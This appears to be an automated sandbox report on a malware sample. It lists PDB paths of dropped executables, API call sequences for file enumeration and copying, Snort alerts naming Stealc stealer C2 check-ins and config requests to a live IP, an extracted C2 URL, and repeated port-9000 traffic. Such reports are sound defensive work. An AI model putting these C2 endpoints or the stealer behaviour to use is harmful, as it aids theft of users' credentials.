Source:	Binary string: mozglue.pdb source: u5mc.0.exe, 00000001.00000002.2187775846.000000006BA8D000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: run.exe, 00000002.00000002.1851199040.00000000002EC000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000002.00000000.1781422592.00000000002EC000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000014.00000000.2132304102.00000000002EC000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000014.00000002.2222284891.00000000002EC000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Telemetry\obj\Release\Telemetry.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2969194740.00000195253D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb^ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2969703290.0000019525400000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2947178540.00000195245B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb@=Z= L=_CorDllMainmscoree.dll source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: run.exe, 00000002.00000002.1853871148.000000006C367000.00000002.00000001.01000000.0000000A.sdmp, run.exe, 00000014.00000002.2226380643.000000006CCB7000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950146568.0000019524750000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_en-us\obj\Release\Locale_en-us.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2949876719.0000019524700000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2969703290.0000019525400000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2947237762.00000195245C0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: M:\DATA\Projects\BitClipper2017\Release\BitClipper2017.pdb source: BAEBFIIECB.exe, 00000012.00000002.2887742911.000000000074C000.00000002.00000001.01000000.00000016.sdmp, BAEBFIIECB.exe, 00000012.00000000.2091744487.000000000074C000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ko-kr\obj\Release\Locale_ko-kr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdbF source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdbf source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb. source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2954807445.0000019524B20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_it-it\obj\Release\Locale_it-it.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2949744272.00000195246F0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2947237762.00000195245C0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: F/,C:\tebu\watag.pdb source: QPoX60yhZt.exe, 00000000.00000002.1992058029.00000000041CE000.00000004.00000020.00020000.00000000.sdmp, QPoX60yhZt.exe, 00000000.00000000.1633911782.0000000000412000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2954807445.0000019524B20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959550582.0000019524DE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2949744272.00000195246F0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ja-jp\obj\Release\Locale_ja-jp.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: wntdll.pdbUGP source: run.exe, 00000002.00000002.1853013778.00000000040C4000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1853424505.00000000048D3000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000002.00000002.1853184012.0000000004420000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082097124.0000000004E45000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082757737.0000000005320000.00000004.00001000.00020000.00000000.sdmp, run.exe, 00000014.00000002.2225745803.00000000042DA000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000014.00000002.2225119329.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224774444.0000000003ACA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: /_/obj/Release/TelemetryChannel/net452/Microsoft.AI.ServerTelemetryChannel.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2969256826.00000195253E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BCBC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD1E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2957165244.0000019524C00000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: c:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\tebu\watag.pdb source: QPoX60yhZt.exe, 00000000.00000002.1992058029.00000000041CE000.00000004.00000020.00020000.00000000.sdmp, QPoX60yhZt.exe, 00000000.00000000.1633911782.0000000000412000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdbR source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: nss3.pdb source: u5mc.0.exe, 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_zh-tw\obj\Release\Locale_zh-tw.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\vonemupetugi\nixume\rowirelido\roxiyemayevu38\cugoca hi.pdb source: QPoX60yhZt.exe, 00000000.00000003.1687520490.0000000005D31000.00000004.00000020.00020000.00000000.sdmp, u5mc.0.exe, 00000001.00000000.1685416967.0000000000412000.00000002.00000001.01000000.00000005.sdmp

Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00412570
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040D1C0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_004015C0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	1_2_00411650
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040B610
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	1_2_0040DB60
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	1_2_00411B80
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_0040D540
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	1_2_004121F0
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Code function: 2_2_6C26261E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	2_2_6C26261E

Source: C:\Users\user\Desktop\QPoX60yhZt.exe	File opened: C:\Users\user\AppData\Local\Temp\u5mc.2	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	File opened: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2856233 ETPRO TROJAN Win32/Unknown Loader Related Activity (GET) 192.168.2.4:49730 -> 185.172.128.90:80
Source: Traffic	Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.4:49733 -> 185.172.128.76:80
Source: Traffic	Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.4:49733 -> 185.172.128.76:80
Source: Traffic	Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 185.172.128.76:80 -> 192.168.2.4:49733
Source: Traffic	Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.4:49733 -> 185.172.128.76:80
Source: Traffic	Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 185.172.128.76:80 -> 192.168.2.4:49733

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 185.172.128.76/3cd2b41cbde8fc9c.php
Source: Malware configuration extractor	URLs: http://185.172.128.76/3cd2b41cbde8fc9c.php

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 91.215.85.66 ports 9000,1,4,5,6,7,15647

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49828
